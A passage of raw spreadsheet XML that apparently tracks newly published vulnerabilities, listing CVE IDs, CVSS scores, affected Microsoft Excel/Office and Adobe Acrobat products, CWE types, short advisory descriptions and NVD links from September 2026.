t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81947</t></is></c></row><row r="645"><c r="A645" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B645" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C645" s="5" t="inlineStr"><is><t>CVE-2026-81948</t></is></c><c r="D645" s="5" t="n"><v>7.8</v></c><c r="E645" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F645" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G645" s="5" t="inlineStr" /><c r="H645" s="5" t="n"><v>0.004</v></c><c r="I645" s="5" t="inlineStr" /><c r="J645" s="5" t="inlineStr" /><c r="K645" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L645" s="5" t="inlineStr" /><c r="M645" s="5" t="inlineStr" /><c r="N645" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O645" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P645" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q645" s="5" t="inlineStr" /><c r="R645" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S645" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T645" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81948</t></is></c></row><row r="646"><c r="A646" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B646" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C646" s="5" t="inlineStr"><is><t>CVE-2026-81949</t></is></c><c r="D646" s="5" t="n"><v>7.8</v></c><c r="E646" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F646" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G646" s="5" t="inlineStr" /><c r="H646" s="5" t="n"><v>0.004</v></c><c r="I646" s="5" t="inlineStr" /><c r="J646" s="5" t="inlineStr" /><c r="K646" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L646" s="5" t="inlineStr" /><c r="M646" s="5" t="inlineStr" /><c r="N646" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O646" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P646" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q646" s="5" t="inlineStr" /><c r="R646" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S646" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T646" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81949</t></is></c></row><row r="647"><c r="A647" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B647" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C647" s="5" t="inlineStr"><is><t>CVE-2026-81950</t></is></c><c r="D647" s="5" t="n"><v>7.8</v></c><c r="E647" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F647" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G647" s="5" t="inlineStr" /><c r="H647" s="5" t="n"><v>0.004</v></c><c r="I647" s="5" t="inlineStr" /><c r="J647" s="5" t="inlineStr" /><c r="K647" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L647" s="5" t="inlineStr" /><c r="M647" s="5" t="inlineStr" /><c r="N647" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O647" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P647" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q647" s="5" t="inlineStr" /><c r="R647" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S647" s="5" t="inlineStr"><is><t>Double free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T647" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81950</t></is></c></row><row r="648"><c r="A648" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B648" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C648" s="5" t="inlineStr"><is><t>CVE-2026-81951</t></is></c><c r="D648" s="5" t="n"><v>7.8</v></c><c r="E648" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F648" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G648" s="5" t="inlineStr" /><c r="H648" s="5" t="n"><v>0.004</v></c><c r="I648" s="5" t="inlineStr" /><c r="J648" s="5" t="inlineStr" /><c r="K648" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L648" s="5" t="inlineStr" /><c r="M648" s="5" t="inlineStr" /><c r="N648" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O648" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P648" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q648" s="5" t="inlineStr" /><c r="R648" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S648" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T648" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81951</t></is></c></row><row r="649"><c r="A649" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B649" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C649" s="5" t="inlineStr"><is><t>CVE-2026-81953</t></is></c><c r="D649" s="5" t="n"><v>7.8</v></c><c r="E649" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F649" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G649" s="5" t="inlineStr" /><c r="H649" s="5" t="n"><v>0.004</v></c><c r="I649" s="5" t="inlineStr" /><c r="J649" s="5" t="inlineStr" /><c r="K649" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L649" s="5" t="inlineStr" /><c r="M649" s="5" t="inlineStr" /><c r="N649" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O649" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P649" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q649" s="5" t="inlineStr" /><c r="R649" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S649" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T649" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81953</t></is></c></row><row r="650"><c r="A650" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B650" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C650" s="5" t="inlineStr"><is><t>CVE-2026-81954</t></is></c><c r="D650" s="5" t="n"><v>7.8</v></c><c r="E650" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F650" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G650" s="5" t="inlineStr" /><c r="H650" s="5" t="n"><v>0.003</v></c><c r="I650" s="5" t="inlineStr" /><c r="J650" s="5" t="inlineStr" /><c r="K650" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L650" s="5" t="inlineStr" /><c r="M650" s="5" t="inlineStr" /><c r="N650" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O650" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P650" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q650" s="5" t="inlineStr" /><c r="R650" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S650" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T650" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81954</t></is></c></row><row r="651"><c r="A651" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B651" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C651" s="5" t="inlineStr"><is><t>CVE-2026-81956</t></is></c><c r="D651" s="5" t="n"><v>7.8</v></c><c r="E651" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F651" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G651" s="5" t="inlineStr" /><c r="H651" s="5" t="n"><v>0.004</v></c><c r="I651" s="5" t="inlineStr" /><c r="J651" s="5" t="inlineStr" /><c r="K651" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L651" s="5" t="inlineStr" /><c r="M651" s="5" t="inlineStr" /><c r="N651" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O651" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P651" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q651" s="5" t="inlineStr" /><c r="R651" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S651" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T651" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81956</t></is></c></row><row r="652"><c r="A652" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B652" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C652" s="5" t="inlineStr"><is><t>CVE-2026-81957</t></is></c><c r="D652" s="5" t="n"><v>7.8</v></c><c r="E652" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F652" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G652" s="5" t="inlineStr" /><c r="H652" s="5" t="n"><v>0.004</v></c><c r="I652" s="5" t="inlineStr" /><c r="J652" s="5" t="inlineStr" /><c r="K652" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L652" s="5" t="inlineStr" /><c r="M652" s="5" t="inlineStr" /><c r="N652" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O652" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P652" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q652" s="5" t="inlineStr" /><c r="R652" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S652" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T652" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81957</t></is></c></row><row r="653"><c r="A653" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B653" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C653" s="5" t="inlineStr"><is><t>CVE-2026-81959</t></is></c><c r="D653" s="5" t="n"><v>7.8</v></c><c r="E653" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F653" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G653" s="5" t="inlineStr" /><c r="H653" s="5" t="n"><v>0.004</v></c><c r="I653" s="5" t="inlineStr" /><c r="J653" s="5" t="inlineStr" /><c r="K653" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L653" s="5" t="inlineStr" /><c r="M653" s="5" t="inlineStr" /><c r="N653" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O653" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P653" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q653" s="5" t="inlineStr" /><c r="R653" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S653" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T653" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81959</t></is></c></row><row r="654"><c r="A654" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B654" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C654" s="5" t="inlineStr"><is><t>CVE-2026-81960</t></is></c><c r="D654" s="5" t="n"><v>7.8</v></c><c r="E654" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F654" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G654" s="5" t="inlineStr" /><c r="H654" s="5" t="n"><v>0.004</v></c><c r="I654" s="5" t="inlineStr" /><c r="J654" s="5" t="inlineStr" /><c r="K654" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L654" s="5" t="inlineStr" /><c r="M654" s="5" t="inlineStr" /><c r="N654" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O654" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P654" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q654" s="5" t="inlineStr" /><c r="R654" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S654" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T654" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81960</t></is></c></row><row r="655"><c r="A655" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B655" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C655" s="5" t="inlineStr"><is><t>CVE-2026-81973</t></is></c><c r="D655" s="5" t="n"><v>7.8</v></c><c r="E655" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F655" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G655" s="5" t="inlineStr" /><c r="H655" s="5" t="n"><v>0.002</v></c><c r="I655" s="5" t="inlineStr" /><c r="J655" s="5" t="inlineStr" /><c r="K655" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L655" s="5" t="inlineStr" /><c r="M655" s="5" t="inlineStr" /><c r="N655" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O655" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P655" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q655" s="5" t="inlineStr" /><c r="R655" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S655" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T655" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81973</t></is></c></row><row r="656"><c r="A656" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B656" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C656" s="5" t="inlineStr"><is><t>CVE-2026-81975</t></is></c><c r="D656" s="5" t="n"><v>7.8</v></c><c r="E656" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F656" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G656" s="5" t="inlineStr" /><c r="H656" s="5" t="n"><v>0.002</v></c><c r="I656" s="5" t="inlineStr" /><c r="J656" s="5" t="inlineStr" /><c r="K656" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L656" s="5" t="inlineStr" /><c r="M656" s="5" t="inlineStr" /><c r="N656" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O656" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P656" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q656" s="5" t="inlineStr" /><c r="R656" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S656" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T656" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81975</t></is></c></row><row r="657"><c r="A657" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B657" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C657" s="5" t="inlineStr"><is><t>CVE-2026-81976</t></is></c><c r="D657" s="5" t="n"><v>7.8</v></c><c r="E657" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F657" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G657" s="5" t="inlineStr" /><c r="H657" s="5" t="n"><v>0.002</v></c><c r="I657" s="5" t="inlineStr" /><c r="J657" s="5" t="inlineStr" /><c r="K657" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L657" s="5" t="inlineStr" /><c r="M657" s="5" t="inlineStr" /><c r="N657" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O657" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P657" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q657" s="5" t="inlineStr" /><c r="R657" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S657" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T657" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81976</t></is></c></row><row r="658"><c r="A658" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B658" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C658" s="5" t="inlineStr"><is><t>CVE-2026-81979</t></is></c><c r="D658" s="5" t="n"><v>7.8</v></c><c r="E658" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F658" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G658" s="5" t="inlineStr" /><c r="H658" s="5" t="n"><v>0.002</v></c><c r="I658" s="5" t="inlineStr" /><c r="J658" s="5" t="inlineStr" /><c r="K658" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L658" s="5" t="inlineStr" /><c r="M658" s="5" t="inlineStr" /><c r="N658" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O658" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P658" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q658" s="5" t="inlineStr" /><c r="R658" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S658" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T658" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81979</t></is></c></row><row r="659"><c r="A659" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B659" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C659" s="5" t="inlineStr"><is><t>CVE-2026-81980</t></is></c><c r="D659" s="5" t="n"><v>7.8</v></c><c r="E659" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F659" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G659" s="5" t="inlineStr" /><c r="H659" s="5" t="n"><v>0.002</v></c><c r="I659" s="5" t="inlineStr" /><c r="J659" s="5" t="inlineStr" /><c r="K659" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L659" s="5" t="inlineStr" /><c r="M659" s="5" t="inlineStr" /><c r="N659" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O659" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P659" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q659" s="5" t="inlineStr" /><c r="R659" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S659" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T659" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81980</t></is></c></row><row r="660"><c r="A660" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B660" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C660" s="5" t="inlineStr"><is><t>CVE-2026-81981</t></is></c><c r="D660" s="5" t="n"><v>7.8</v></c><c r="E660" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F660" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G660" s="5" t="inlineStr" /><c r="H660" s="5" t="n"><v>0.002</v></c><c r="I660" s="5" t="inlineStr" /><c r="J660" s="5" t="inlineStr" /><c r="K660" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L660" s="5" t="inlineStr" /><c r="M660" s="5" t="inlineStr" /><c r="N660" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O660" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P660" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q660" s="5" t="inlineStr" /><c r="R660" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S660" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T660" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81981</t></is></c></row><row r="661"><c r="A661" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B661" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C661" s="5" t="inlineStr"><is><t>CVE-2026-81983</t></is></c><c r="D661" s="5" t="n"><v>7.8</v></c><c r="E661" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F661" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G661" s="5" t="inlineStr" /><c r="H661" s="5" t="n"><v>0.002</v></c><c r="I661" s="5" t="inlineStr" /><c r="J661" s="5" t="inlineStr" /><c r="K661" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L661" s="5" t="inlineStr" /><c r="M661" s="5" t="inlineStr" /><c r="N661" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O661" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P661" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q661" s="5" t="inlineStr" /><c r="R661" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S661" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T661" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81983</t></is></c></row><row r="662"><c r="A662" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B662" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C662" s="5" t="inlineStr"><is><t>CVE-2026-81985</t></is></c><c r="D662" s="5" t="n"><v>7.8</v></c><c r="E662" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F662" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G662" s="5" t="inlineStr" /><c r="H662" s="5" t="n"><v>0.002</v></c><c r="I662" s="5" t="inlineStr" /><c r="J662" s="5" t="inlineStr" /><c r="K662" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L662" s="5" t="inlineStr" /><c r="M662" s="5" t="inlineStr" /><c r="N662" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O662" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P662" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q662" s="5" t="inlineStr" /><c r="R662" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S662" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T662" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81985</t></is></c></row><row r="663"><c r="A663" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B663" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C663" s="5" t="inlineStr"><is><t>CVE-2026-81986</t></is></c><c r="D663" s="5" t="n"><v>7.8</v></c><c r="E663" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F663" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G663" s="5" t="inlineStr" /><c r="H663" s="5" t="n"><v>0.002</v></c><c r="I663" s="5" t="inlineStr" /><c r="J663" s="5" t="inlineStr" /><c r="K663" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L663" s="5" t="inlineStr" /><c r="M663" s="5" t="inlineStr" /><c r="N663" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O663" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P663" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q663" s="5" t="inlineStr" /><c r="R663" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S663" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T663" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81986</t></is></c></row><row r="664"><c r="A664" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B664" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C664" s="5" t="inlineStr"><is><t>CVE-2026-81987</t></is></c><c r="D664" s="5" t="n"><v>7.8</v></c><c r="E664" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F664" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G664" s="5" t="inlineStr" /><c r="H664" s="5" t="n"><v>0.002</v></c><c r="I664" s="5" t="inlineStr" /><c r="J664" s="5" t="inlineStr" /><c r="K664" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L664" s="5" t="inlineStr" /><c r="M664" s="5" t="inlineStr" /><c r="N664" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O664" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P664" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q664" s="5" t="inlineStr" /><c r="R664" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S664" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T664" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81987</t></is></c></row><row r="665"><c r="A665" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B665" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C665" s="5" t="inlineStr"><is><t>CVE-2026-81988</t></is></c><c r="D665" s="5" t="n"><v>7.8</v></c><c r="E665" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F665" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G665" s="5" t="inlineStr" /><c r="H665" s="5" t="n"><v>0.002</v></c><c r="I665" s="5" t="inlineStr" /><c r="J665" s="5" t="inlineStr" /><c 